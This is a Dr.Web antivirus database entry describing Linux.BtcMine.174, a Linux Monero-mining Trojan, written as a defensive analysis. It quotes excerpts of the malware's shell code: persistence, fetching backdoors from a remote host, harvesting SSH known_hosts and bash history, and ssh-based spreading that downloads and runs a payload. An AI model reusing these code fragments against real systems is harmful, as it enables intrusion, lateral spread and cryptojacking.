Protege lo creado

Otros recursos

  • — utilidades gratuitas, complementos, informadores
  • — un servicio en Internet para los proveedores de servicios Dr.Web AV-Desk
  • — utilidad de desinfección de red Dr.Web CureNet!

Mi biblioteca
Mi biblioteca

+ Añadir a la biblioteca

Soporte 24 horas | Normas de contactar

Sus solicitudes



Added to the Dr.Web virus database: 2018-11-14

Virus description added:


  • 9ae9233c79390495e607059870671c9936c413c5
  • b59fc07afc9f159562f71b3a21c38b1d471acc2f

A multicomponent malware program capable of infecting Linux devices and intended to be used for Monero (XMR) mining. It is implemented as a shell script containing over 1,000 lines of code.

When launched, it checks whether the server, from which the Trojan will subsequently download additional modules, is available:

function GetDownloadPath()
    paths=("/usr/bin" "/bin" "/lib" "/boot" "/tmp" "/home/`whoami`" "`pwd`")
    for path in ${paths[@]}
        if [ -x $path ] && [ -r $path ] && [ -w $path ]

If the script is not run with /sbin/init, the following actions are performed:

  1. The script is moved to a previously selected folder with write permissions (rwx) that is named diskmanagerd (the name is specified in the $WatchDogName variable).
  2. The script tries to restart using nohup or just in the background if nohup is not installed (in this case, the Trojan installs the coreutils package).
function Nohup()
    if [ "$arg" != "/sbin/init" ]
        rm -f $DownloadPath$WatchDogName >/dev/null 2>&1
        cp -rf $0 $DownloadPath$WatchDogName
        chmod 755 $DownloadPath$WatchDogName >/dev/null 2>&1
        rm -f $0
        nohup --help >/dev/null 2>&1
        if [ $? -eq 0 ]
            nohup $DownloadPath$WatchDogName "/sbin/init"> $DownloadPath.templog 2>&1 &
            if [ `id -u` -eq "0" ]
                yum install coreutils -y  >/dev/null 2>&1
                apt-get install coreutils -y  >/dev/null 2>&1
                sleep 30
            (exec $DownloadPath$WatchDogName "/sbin/init" &> /dev/null &)

Then the Trojan downloads and runs a version of the Linux.BackDoor.Gates.9 Trojan. This family of backdoors allows commands issued by cybercriminals to be executed and DDoS attacks to be carried out:

function oh_cause_she_is_dead()
    md5sum --help >/dev/null 2>&1
    if [ "$?" = "0" ]
        if [ `id -u` -eq "0" ]
            DownloadFile "md5" "$mdfive_root" "http://$remote_host/syn" "$DownloadPath$DownloadFileName"
            DownloadFile "md5" "$mdfive_user" "http://$remote_host/udp" "$DownloadPath$DownloadFileName"
        if [ `id -u` -eq "0" ]
            DownloadFile "size" "$DownloadFileSize" "http://$remote_host/syn" "$DownloadPath$DownloadFileName"
            DownloadFile "size" "$DownloadFileSize" "http://$remote_host/udp" "$DownloadPath$DownloadFileName"
    chmod 755 "$DownloadPath$DownloadFileName"

After that, the malware program searches for other miners and removes them when it detects them. For this, it scans /proc/${pid}/exe and /proc/${pid}/cmdline to check for specific lines (cryptonight, stratum+tcp, etc.).

If Linux.BtcMine.174 was not launched as root, it downloads and runs another shell script (SHA1: 9ae9233c79390495e607059870671c9936c413c5) from the attackers’ server, which, in turn, downloads and runs a number of exploits to escalate the privileges of Linux.Exploit.CVE-2016-5195 (DirtyCow) and Linux.Exploit.CVE-2013-2094 in the system.

In the next step, the script checks to see whether it is running as root. If it is, it stops services, removes their files using package managers, and empties the directories. The names of the following services are listed in the script: safedog, aegis, yunsuo, clamd, avast, avgd, cmdavd, cmdmgd, drweb-configd, drweb-spider-kmod, esets, xmirrord.

Then the Trojan adds itself to the Autorun list, using /etc/rc.local, /etc/rc.d/..., /etc/cron.hourly. After that, it downloads and launches a rootkit, also executed as a shell script. Among the rootkit module’s notable features is the ability to steal user-entered passwords for the su command and to hide files in the file system, network connections, and running processes.

After that, the Trojan runs a feature that collects data from various sources about all the hosts to which the current user has previously connected via SSH. The Trojan tries to connect to these hosts and infect them:

cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /tmp/.h|grep -v|grep -v localhost|sort -u > /tmp/.hh
cat /tmp/.hh > /tmp/.h
rm -rf /tmp/.hh
for i in `cat /tmp/.h`
        exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget -c -O /tmp/ ;curl -o /tmp/ ;python -c \"import urllib;urllib.urlretrieve(\\\"\\\", \\\"/tmp/\\\")\";php -r '\$f=fopen(\"'/tmp/'\",\"w\");fwrite(\$f, implode(\"\",@file(\"''\")));fclose(\$f);';ruby -e \"require 'open-uri';'/tmp/', 'w') {|f| f.write(open('') {|f1|})}\";perl -MNet::FTP -e \"\\\$ftp = Net::FTP->new(\\\"\\\");\\\$ftp->login('', '');\\\$ftp->binary;\\\$ftp->get(\\\"\\\",\\\"/tmp/\\\")\";chmod 755 /tmp/;(exec /tmp/ &> /dev/null &)" &> /dev/null &

Next, the Trojan launches and maintains a Monero (XMR) miner. In an infinite loop, the script checks for updates on a remote server so that it can download and install them if they become available. To do that, it carries out the following actions:

  1. The current script version number is stored to the $shell_ver variable.
  2. The file http://${remote_host}:${remote_port}/shell_ver.txt is downloaded.
  3. The obtained version is checked against the current one. If they match, nothing happens; if they do not match, the Trojan downloads the new script version from the management server.

News about the Trojan

Curing recommendations


After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number

Desarrollador ruso de antivirus Dr.Web
Experiencia de desarrollo a partir del año 1992
Dr.Web se usa en más de 200 países del mundo
Entrega de antivirus como servicio a partir del año 2007
Soporte 24 horas

Dr.Web © Doctor Web
2003 — 2020

Doctor Web es un productor ruso de los medios antivirus de protección de la información bajo la marca Dr.Web. Los productos Dr. Web se desarrollan a partir del año 1992.

125124, Rusia, Moscú, c/3 Yamskogo Polya, 2, edif.12А